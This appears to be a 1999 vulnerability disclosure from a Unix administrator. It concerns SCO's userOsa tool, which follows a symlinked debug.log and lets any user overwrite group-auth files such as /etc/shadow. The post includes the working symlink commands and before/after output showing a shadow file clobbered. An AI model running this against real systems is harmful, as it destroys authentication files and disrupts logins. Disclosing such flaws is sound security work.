Greetings,

Any user may overwrite any file with group auth (i.e. /etc/shadow,
/etc/passwd) using /etc/sysadm.d/bin/userOsa.  Note that this will not
change the permissions of the file or allow for the user to input a
passwd entry string into these files, it will simply clobber the contents
of the file with debug output.

When userOsa recieves invalid input, it generates a log file called
"debug.log" in the PWD.  This file is created with group auth
permissions,does not check for this file's existence, and will follow
symlinks. Thus the exploit is as follows:


scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa
bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect
Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$

-----

BEFORE EXPLOIT:
scohack:/# l /etc/shadow.old
-rw-rw----   1 root     auth          26 Oct 11 20:08 /etc/shadow.old

AFTER EXPLOIT (note the file size):
scohack:/# l /etc/shadow.old
-rw-rw----   1 root     auth         177 Oct 11 20:10 /etc/shadow.old

scohack:/# cat /etc/shadow.old
>>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
<<<
SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
{Invalid Connect Request: bah}}})

scohack:/#

Brock Tellier
UNIX Systems Administrator